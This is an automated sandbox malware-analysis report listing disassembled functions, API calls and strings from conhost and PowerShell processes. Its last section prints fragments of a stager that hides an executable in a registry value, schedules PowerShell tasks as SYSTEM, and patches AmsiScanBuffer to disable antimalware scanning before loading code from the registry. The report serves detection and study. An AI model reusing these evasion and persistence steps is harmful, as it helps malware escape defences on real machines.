Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: A371B736A007C151EB7C9FAE98543EA6B96F345B94F40403AFE9943B86DEB9C702C701

Function 0000013F081C80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000013F081C80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000013F081C8162

Strings

csm, xrefs: 0000013F081C8149

Memory Dump Source

Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 08c7ba7983eea97fc99f2f09eca11af2549d3dca7f5dc07ff2d29dca2c3586f0
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 9051DB32B21A008ADB5CCF1DD488BAD3B93FB44B95FA54139FA5A47786D778D942C700

Function 0000013F081C9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000013F081C9BA7

Strings

MOC, xrefs: 0000013F081C9B6F
RCC, xrefs: 0000013F081C9B77

Memory Dump Source

Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 6dd8f896749ead0f3972c5345b51d00b35986c4aca2a55f649bb31c96a55fab9
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 9361C332908BC481D7748F19E4407DABFA1FB85B98F544229FB9817B96DB7CC291CB00

Function 0000013F08E625DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000013F08E626C2
StrCpyW.SHLWAPI ref: 0000013F08E626D9

Strings

\\.\pipe\, xrefs: 0000013F08E626CD

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: b4b58d1c2b72eae466f3a76b62a051c68817fcf0eeed34b614ad6f3307ace2b3
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: AF512936A0478185EA2C9EADA4587EA6F53F3857E0F04003DEF5943B8BDA3DD612C742

Function 0000013F08E925DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000013F08E926C2
StrCpyW.SHLWAPI ref: 0000013F08E926D9

Strings

\\.\pipe\, xrefs: 0000013F08E926CD

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 28921b8b6e6a0b3ef2da58af08ca0a79d02deccbf86d4597586aa48eb95b67f6
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 9A51D736A047C151EE2CCEADA4543EA6E53F385B44F54003DEEA953B8BDABDC606C741

Function 0000013F08E72660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000013F08E72778
GetLastError.KERNEL32 ref: 0000013F08E7279D

Strings

U, xrefs: 0000013F08E72722

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: ba51a26a6b4c4ac527bf48cd19eaf96d8a1271236b2117ff3b18072a7037b621
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 2941F932A15A8086E764CFA9E4447D9BBA2F348794F90413AFF4D87759EB3CC642C741

Function 0000013F08EA2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000013F08EA2778
GetLastError.KERNEL32 ref: 0000013F08EA279D

Strings

U, xrefs: 0000013F08EA2722

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: e6b9c866c4e5c52688ba7d83f54ae4432361f971b725623edd349ea0ddf03abd
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 7441F472A15A8086E754CFA9E4443DABBA6F388B80F404039FF4D97759EB3CD602C741

Function 0000013F08E69178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000013F08E691C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000013F08E687F7), ref: 0000013F08E69209

Strings

csm, xrefs: 0000013F08E691F6

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: c2fe5a2b06baf2bb84484fe11f47b52419933160ad8600700eb755cce1005a52
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: D8113332614B4082EB258F19F4442997BE6F788B94F694225EECD0776ADF3CC652CB00

Function 0000013F08E99178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000013F08E991C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000013F08E987F7), ref: 0000013F08E99209

Strings

csm, xrefs: 0000013F08E991F6

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: b685c277dccc3ce888cd87ed86701a972d08f69cdc049bfcd86ebf6f17d8bdd1
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: BA115132614B8082DB148B59F404289BBE2F788B84F594228EECD0775AEF7CC652C700

Function 0000013F08E61D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E61D69
HeapAlloc.KERNEL32 ref: 0000013F08E61D77
GetProcessHeap.KERNEL32 ref: 0000013F08E61D9C
HeapFree.KERNEL32 ref: 0000013F08E61DAA

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: a593c1f2405ce7dc247d6a2b3c562d80240cb724859ed7369ce98e381d0eaac4
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: FB116131A01F8085EA19CBAAE4042997BA2F788FD1F584138EE4E53766DF3CD5538300

Function 0000013F08E91D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E91D69
HeapAlloc.KERNEL32 ref: 0000013F08E91D77
GetProcessHeap.KERNEL32 ref: 0000013F08E91D9C
HeapFree.KERNEL32 ref: 0000013F08E91DAA

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 4705185877040052977e1e6f0db8c71f75b8fe4d5a1e2e2ece074b828ce7a5ba
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: A3118431A01F8095EA19CBAAA4042997BB6F788FD1F584138EE8E53766DF7CD543C300

Function 0000013F08E61264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E6126A
HeapAlloc.KERNEL32 ref: 0000013F08E61279
GetProcessHeap.KERNEL32 ref: 0000013F08E61293
HeapAlloc.KERNEL32 ref: 0000013F08E612A4

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 57a507f5e9bc61601a0db08a182ae8d39cc54173d836c6510bbdb84dd7c5a020
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 5DE09231A01A049AF7288FA6D8083893BE2FB8CF26F44C038C90907351EF7D95DAC741

Function 0000013F08E91264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E9126A
HeapAlloc.KERNEL32 ref: 0000013F08E91279
GetProcessHeap.KERNEL32 ref: 0000013F08E91293
HeapAlloc.KERNEL32 ref: 0000013F08E912A4

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 486dbf2a119a27738309918542d65e5ad1d527f92bbfbf537fd17907e4343c62
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 00E09231A01A04AAE7188FE6D8083A9BAE2FB9CF05F44C038C90907351EF7D95DAC741

Function 0000013F08E61000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E61006
HeapAlloc.KERNEL32 ref: 0000013F08E61015
GetProcessHeap.KERNEL32 ref: 0000013F08E61028
HeapAlloc.KERNEL32 ref: 0000013F08E61037

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 0602284d5fca1330a80f16e5194f0361a6f22db0995db6d14b2bea1fcc96e73c
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: FBE01271A119049BE72C9FA6DC043997BE2FB8CF26F448078C90907711EE3C959AD711

Function 0000013F08E91000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E91006
HeapAlloc.KERNEL32 ref: 0000013F08E91015
GetProcessHeap.KERNEL32 ref: 0000013F08E91028
HeapAlloc.KERNEL32 ref: 0000013F08E91037

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 94946a16bf9d3971abd78f1840f9ca22ce951c217396a7dba2e5ae8a2797a85c
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 22E01271A11904ABE71C9FE6DC043A9BAE2FB9CF15F448078C90907311EE3C959AD711

Analysis Process: powershell.exePID: 7544, Parent PID: 8184COMMON

Executed Functions

Function 045DD005 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2454930199.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_45dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44fb274ce14868ea9c95bcb8f27c53da3ea5d8d95758f503f1deb8ca3f1bc63
Instruction ID: cce4c4cf4bd91acee9384212ab02f5384f1ae2e31ccf1bd010d575d30e372972
Opcode Fuzzy Hash: c44fb274ce14868ea9c95bcb8f27c53da3ea5d8d95758f503f1deb8ca3f1bc63
Instruction Fuzzy Hash: 8601806100D3C09FD7128B259C94752BFB8EF83224F09C5DBE8888F193D2696C49D772

Function 045DD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2454930199.00000000045DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_45dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ace76af94694db0acfe4058b198ce1c2f70ff5f2e91465d21ab4041f3239a9b
Instruction ID: 130e766004068d53e2385335fc070382fea0b0b5fa04dcc30714d1c1df2e5fc8
Opcode Fuzzy Hash: 5ace76af94694db0acfe4058b198ce1c2f70ff5f2e91465d21ab4041f3239a9b
Instruction Fuzzy Hash: 9D0120311043009AD7304E1DED84767BFACFFC5364F08C515DC080B146E279E849D6B1

Analysis Process: powershell.exePID: 7528, Parent PID: 7544COMMON

Execution Graph

Execution Coverage:	74.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.7%
Total number of Nodes:	101
Total number of Limit Nodes:	9

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004011AD Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 356
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
SysAllocString.OLEAUT32(00402234), ref: 004011CC
SysAllocString.OLEAUT32(powershell), ref: 004011D8
SysAllocString.OLEAUT32(?), ref: 004011E0
SysAllocString.OLEAUT32(0040218C), ref: 004011EA
SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
VariantInit.OLEAUT32(?), ref: 00401250
VariantInit.OLEAUT32(?), ref: 004013EA
VariantInit.OLEAUT32(?), ref: 004013F0
VariantInit.OLEAUT32(?), ref: 00401400
CoUninitialize.COMBASE ref: 004014E8
SysFreeString.OLEAUT32(?), ref: 004014FA
SysFreeString.OLEAUT32(00000000), ref: 004014FD
SysFreeString.OLEAUT32(?), ref: 00401502
SysFreeString.OLEAUT32(?), ref: 00401507
SysFreeString.OLEAUT32(?), ref: 0040150C
SysFreeString.OLEAUT32(?), ref: 00401511

Strings

$rbx-svc64, xrefs: 004011C0, 004011C1
SYSTEM, xrefs: 004011EC
powershell, xrefs: 004011D0
$rbx-svc32, xrefs: 004011B6

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
API String ID: 3960698109-3701805373
Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

Function 004017A5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE

Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
